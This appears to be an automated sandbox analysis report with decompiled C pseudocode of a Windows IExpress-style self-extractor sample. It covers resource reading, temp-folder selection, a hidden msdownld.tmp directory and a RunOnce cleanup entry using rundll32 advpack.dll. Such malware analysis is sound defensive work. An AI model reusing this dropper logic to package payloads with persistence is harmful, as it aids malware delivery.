• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00392250
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
• API String ID: 178549006-850274211
• Opcode ID: a827c4330dbc607ab595082f7f710cb5f4d77f1a3a24ba94bd03f5645fac636e
• Instruction ID: 25b1207ff73be59250de95b6f9a9fcd540895c53daf6b14951a59b72ab9f6c32
• Opcode Fuzzy Hash: a827c4330dbc607ab595082f7f710cb5f4d77f1a3a24ba94bd03f5645fac636e
• Instruction Fuzzy Hash: 15510775A00614BBDF239B64DC49FFB773CEB45700F0102AAF949E7250DA729D498B90
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 232 3955a0-3955d9 call 39468f LocalAlloc 235 3955db-3955f1 call 3944b9 call 396285 232->235 236 3955fd-39560c call 39468f 232->236 250 3955f6-3955f8 235->250 242 39560e-395630 call 3944b9 LocalFree 236->242 243 395632-395643 lstrcmpA 236->243 242->250 246 39564b-395659 LocalFree 243->246 247 395645 243->247 248 39565b-39565d 246->248 249 395696-39569c 246->249 247->246 252 395669 248->252 253 39565f-395667 248->253 255 39589f-3958b5 call 396517 249->255 256 3956a2-3956a8 249->256 254 3958b7-3958c7 call 396ce0 250->254 257 39566b-39567a call 395467 252->257 253->252 253->257 255->254 256->255 260 3956ae-3956c1 GetTempPathA 256->260 269 39589b-39589d 257->269 270 395680-395691 call 3944b9 257->270 264 3956f3-395711 call 391781 260->264 265 3956c3-3956c9 call 395467 260->265 274 39586c-395890 GetWindowsDirectoryA call 39597d 264->274 275 395717-395729 GetDriveTypeA 264->275 272 3956ce-3956d0 265->272 269->254 270->250 272->269 276 3956d6-3956df call 392630 272->276 274->264 286 395896 274->286 280 39572b-39572e 275->280 281 395730-395740 GetFileAttributesA 275->281 276->264 287 3956e1-3956ed call 395467 276->287 280->281 284 395742-395745 280->284 281->284 285 39577e-39578f call 39597d 281->285 289 39576b 284->289 290 395747-39574f 284->290 297 395791-39579e call 392630 285->297 298 3957b2-3957bf call 392630 285->298 286->269 287->264 287->269 292 395771-395779 289->292 290->292 294 395751-395753 290->294 296 395864-395866 292->296 294->292 299 395755-395762 call 396952 294->299 296->274 296->275 297->289 309 3957a0-3957b0 call 39597d 297->309 306 3957c1-3957cd GetWindowsDirectoryA 298->306 307 3957d3-3957f8 call 39658a GetFileAttributesA 298->307 299->289 308 395764-395769 299->308 306->307 314 39580a 307->314 315 3957fa-395808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->298 316 39580d-39580f 314->316 315->316 317 395811-395825 316->317 318 395827-39585c SetFileAttributesA call 391781 call 395467 316->318 317->296 318->269 323 39585e 318->323 323->296
C-Code - Quality: 92%
			E003955A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x398004; // 0x74c05eb4
				_v8 = _t28 ^ _t110;
				_t2 = E0039468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0039468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x399a30 = 1;
						}
						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0x398b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0x398a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00396517(_t82, 0x7d2, 0, E00393210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x399a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0x3991e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x3991e4);
                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00391781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t68 = E00396952( &_v268);
                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                    																			L30:
                                                                                                                                                                                                    																			_push(0);
                                                                                                                                                                                                    																			_t103 = 3;
                                                                                                                                                                                                    																			_t49 = E0039597D( &_v268, _t103, 1);
                                                                                                                                                                                                    																			__eflags = _t49;
                                                                                                                                                                                                    																			if(_t49 != 0) {
                                                                                                                                                                                                    																				L33:
                                                                                                                                                                                                    																				_t50 = E00392630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t50;
                                                                                                                                                                                                    																				if(_t50 != 0) {
                                                                                                                                                                                                    																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t88 =  &_v268;
                                                                                                                                                                                                    																				E0039658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                    																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                    																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                    																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                    																					__eflags = _t54;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				__eflags = _t54;
                                                                                                                                                                                                    																				if(_t54 != 0) {
                                                                                                                                                                                                    																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                    																					_push(_t88);
                                                                                                                                                                                                    																					_t109 = 0x3991e4;
                                                                                                                                                                                                    																					E00391781(0x3991e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                    																					_t101 = 1;
                                                                                                                                                                                                    																					_t59 = E00395467(0x3991e4, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t59;
                                                                                                                                                                                                    																					if(_t59 != 0) {
                                                                                                                                                                                                    																						goto L45;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t60 = _v268;
                                                                                                                                                                                                    																						goto L42;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t60 = _v268 + 1;
                                                                                                                                                                                                    																					_v265 = 0;
                                                                                                                                                                                                    																					_v268 = _t60;
                                                                                                                                                                                                    																					goto L42;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				_t65 = E00392630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t65;
                                                                                                                                                                                                    																				if(_t65 != 0) {
                                                                                                                                                                                                    																					goto L28;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t67 = E0039597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                    																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00395467(0x3991e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x3991e4;
											_t70 = E00392630(0, 0x3991e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x3991e4;
												_t71 = E00395467(0x3991e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0039597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x398b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00395467(0x398b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E003944B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x399124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x399124 = E00396285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00396CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}
0x003955ab
0x003955b2
0x003955c9
0x003955d5
0x003955d9
0x00395600
0x00395605
0x0039560a
0x0039560c
0x00395638
0x00395641
0x00395643
0x00395645
0x00395645
0x0039564c
0x00395652
0x00395657
0x00395659
0x00395696
0x0039569c
0x0039589f
0x003958a7
0x003958ac
0x003958b3
0x003958b5
0x003956a2
0x003956a2
0x003956a8
0x00000000
0x003956ae
0x003956ae
0x003956b9
0x003956bf
0x003956c1
0x003956f3
0x003956f3
0x00395705
0x0039570a
0x00395711
0x00395717
0x00395724
0x00395726
0x00395729
0x00395730
0x00395737
0x0039573d
0x00395740
0x00000000
0x00000000
0x00000000
0x00000000
0x0039572b
0x0039572b
0x0039572e
0x00395742
0x00395742
0x00395745
0x0039576b
0x0039576b
0x00000000
0x00395747
0x00395747
0x0039574d
0x0039574f
0x00395771
0x00395771
0x00395773
0x00000000
0x00395751
0x00395751
0x00395753
0x00000000
0x00395755
                                                                                                                                                                                                    0x0039575b
                                                                                                                                                                                                    0x00395760
                                                                                                                                                                                                    0x00395762
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395764
                                                                                                                                                                                                    0x00395764
                                                                                                                                                                                                    0x00395769
                                                                                                                                                                                                    0x0039577e
                                                                                                                                                                                                    0x0039577e
                                                                                                                                                                                                    0x00395781
                                                                                                                                                                                                    0x00395788
                                                                                                                                                                                                    0x0039578d
                                                                                                                                                                                                    0x0039578f
                                                                                                                                                                                                    0x003957b2
                                                                                                                                                                                                    0x003957b8
                                                                                                                                                                                                    0x003957bd
                                                                                                                                                                                                    0x003957bf
                                                                                                                                                                                                    0x003957cd
                                                                                                                                                                                                    0x003957cd
                                                                                                                                                                                                    0x003957dd
                                                                                                                                                                                                    0x003957e3
                                                                                                                                                                                                    0x003957ef
                                                                                                                                                                                                    0x003957f5
                                                                                                                                                                                                    0x003957f8
                                                                                                                                                                                                    0x0039580a
                                                                                                                                                                                                    0x0039580a
                                                                                                                                                                                                    0x003957fa
                                                                                                                                                                                                    0x00395802
                                                                                                                                                                                                    0x00395802
                                                                                                                                                                                                    0x0039580d
                                                                                                                                                                                                    0x0039580f
                                                                                                                                                                                                    0x00395830
                                                                                                                                                                                                    0x00395836
                                                                                                                                                                                                    0x0039583d
                                                                                                                                                                                                    0x0039584b
                                                                                                                                                                                                    0x00395851
                                                                                                                                                                                                    0x00395855
                                                                                                                                                                                                    0x0039585a
                                                                                                                                                                                                    0x0039585c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039585e
                                                                                                                                                                                                    0x0039585e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039585e
                                                                                                                                                                                                    0x00395811
                                                                                                                                                                                                    0x00395817
                                                                                                                                                                                                    0x00395819
                                                                                                                                                                                                    0x0039581f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039581f
                                                                                                                                                                                                    0x00395791
                                                                                                                                                                                                    0x00395797
                                                                                                                                                                                                    0x0039579c
                                                                                                                                                                                                    0x0039579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003957a0
                                                                                                                                                                                                    0x003957a9
                                                                                                                                                                                                    0x003957ae
                                                                                                                                                                                                    0x003957b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003957b0
                                                                                                                                                                                                    0x0039579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395769
                                                                                                                                                                                                    0x00395762
                                                                                                                                                                                                    0x00395753
                                                                                                                                                                                                    0x0039574f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039572e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395864
                                                                                                                                                                                                    0x00395864
                                                                                                                                                                                                    0x00395864
                                                                                                                                                                                                    0x00395717
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956c3
                                                                                                                                                                                                    0x003956c5
                                                                                                                                                                                                    0x003956c9
                                                                                                                                                                                                    0x003956ce
                                                                                                                                                                                                    0x003956d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956d6
                                                                                                                                                                                                    0x003956d6
                                                                                                                                                                                                    0x003956d8
                                                                                                                                                                                                    0x003956dd
                                                                                                                                                                                                    0x003956df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956e1
                                                                                                                                                                                                    0x003956e2
                                                                                                                                                                                                    0x003956e4
                                                                                                                                                                                                    0x003956e6
                                                                                                                                                                                                    0x003956eb
                                                                                                                                                                                                    0x003956ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003956f3
                                                                                                                                                                                                    0x003956f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039586c
                                                                                                                                                                                                    0x00395878
                                                                                                                                                                                                    0x0039587e
                                                                                                                                                                                                    0x00395882
                                                                                                                                                                                                    0x00395883
                                                                                                                                                                                                    0x00395889
                                                                                                                                                                                                    0x0039588e
                                                                                                                                                                                                    0x0039588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395896
                                                                                                                                                                                                    0x003956ed
                                                                                                                                                                                                    0x003956df
                                                                                                                                                                                                    0x003956d0
                                                                                                                                                                                                    0x003956c1
                                                                                                                                                                                                    0x003956a8
                                                                                                                                                                                                    0x0039565b
                                                                                                                                                                                                    0x0039565b
                                                                                                                                                                                                    0x0039565d
                                                                                                                                                                                                    0x00395669
                                                                                                                                                                                                    0x00395669
                                                                                                                                                                                                    0x0039565f
                                                                                                                                                                                                    0x0039565f
                                                                                                                                                                                                    0x00395665
                                                                                                                                                                                                    0x00395667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395667
                                                                                                                                                                                                    0x0039566c
                                                                                                                                                                                                    0x00395673
                                                                                                                                                                                                    0x00395678
                                                                                                                                                                                                    0x0039567a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003955CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00395638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0039564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00395620
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003956B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0039571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00395737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003957CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003957EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00395802
                                                                                                                                                                                                      • Part of subcall function 00392630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00392654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00395830
                                                                                                                                                                                                      • Part of subcall function 00396517: FindResourceA.KERNEL32(00390000,000007D6,00000005), ref: 0039652A
                                                                                                                                                                                                      • Part of subcall function 00396517: LoadResource.KERNEL32(00390000,00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00396538
                                                                                                                                                                                                      • Part of subcall function 00396517: DialogBoxIndirectParamA.USER32(00390000,00000000,00000547,003919E0,00000000), ref: 00396557
                                                                                                                                                                                                      • Part of subcall function 00396517: FreeResource.KERNEL32(00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00396560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00395878
                                                                                                                                                                                                      • Part of subcall function 0039597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003959A8
                                                                                                                                                                                                      • Part of subcall function 0039597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003959AF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                    • API String ID: 2436801531-337015389
                                                                                                                                                                                                    • Opcode ID: 05ea4bd5fb37a57994bb2724c6b2240d3fc318c34556bd72c4d4f37fb3cde1a3
                                                                                                                                                                                                    • Instruction ID: 14e1029e97412e03a68a1bf1a10bcca8519ce1e166bfaa7132ed33dc6bf97f8f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ea4bd5fb37a57994bb2724c6b2240d3fc318c34556bd72c4d4f37fb3cde1a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E815871B09A059ADF23AB749C85BFE726D9B61300F0501A6F986E6191EFB08EC18B50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    [Control-flow graph image not reproduced. It covers the basic blocks of function 0039597D from 39597d to 395c14, marking each as executed or not executed; the blocks call GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError and FormatMessageA, plus the internal subcalls 3944b9, 396285, 39268b and 396ce0.]
                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E0039597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                    				_t46 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                    				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                    				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                    					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                    					if(_t55 == 0) {
			L29:
			memset( &_v788, 0, 0x200);
			 *0x399124 = E00396285();
			FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0); // 0x1000 = FORMAT_MESSAGE_FROM_SYSTEM: system text for GetLastError() into _v788
			_t110 = 0x4b0; // message 0x4b0: free space computed as zero
			L30:
			__eflags = 0;
			E003944B9(0, _t110, _t118,  &_v788, 0x10, 0); // reports message _t110 together with the system error text
			SetCurrentDirectoryA( &_v276);
			L31:
			_t66 = 0;
			__eflags = 0;
			L32:
			_pop(_t114);
			goto L33;
		}
		_t69 = _v792 * _v796; // cluster size in bytes, if _v792/_v796 are the GetDiskFreeSpace-style sector/cluster values (assumed; not visible in this fragment)
		_v812 = _t69;
		_t116 = MulDiv(_t69, _v800, 0x400); // free space in KiB: cluster size * _v800 (free clusters, assumed) / 1024
		__eflags = _t116;
		if(_t116 == 0) {
			goto L29;
		}
		_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed; _v820 = max component length, _v816 = file system flags
		__eflags = _t73;
		if(_t73 != 0) {
			SetCurrentDirectoryA( &_v276); // executed
			_t101 =  &_v16;
			_t111 = 6;
			_t119 = _t118 - _t101;
			__eflags = _t119;
			while(1) { // copies at most two bytes of the string at _t118 into _v16 (the loop exits when the counter reaches 4), stopping early at NUL
				_t22 = _t111 - 4; // 0x2
				__eflags = _t22;
				if(_t22 == 0) {
					break;
				}
				_t87 =  *((intOrPtr*)(_t119 + _t101));
				__eflags = _t87;
				if(_t87 == 0) {
					break;
				}
				 *_t101 = _t87;
				_t101 = _t101 + 1;
				_t111 = _t111 - 1;
				__eflags = _t111;
				if(_t111 != 0) {
					continue;
				}
				break;
			}
			__eflags = _t111;
			if(_t111 == 0) {
				_t101 = _t101 - 1;
				__eflags = _t101;
			}
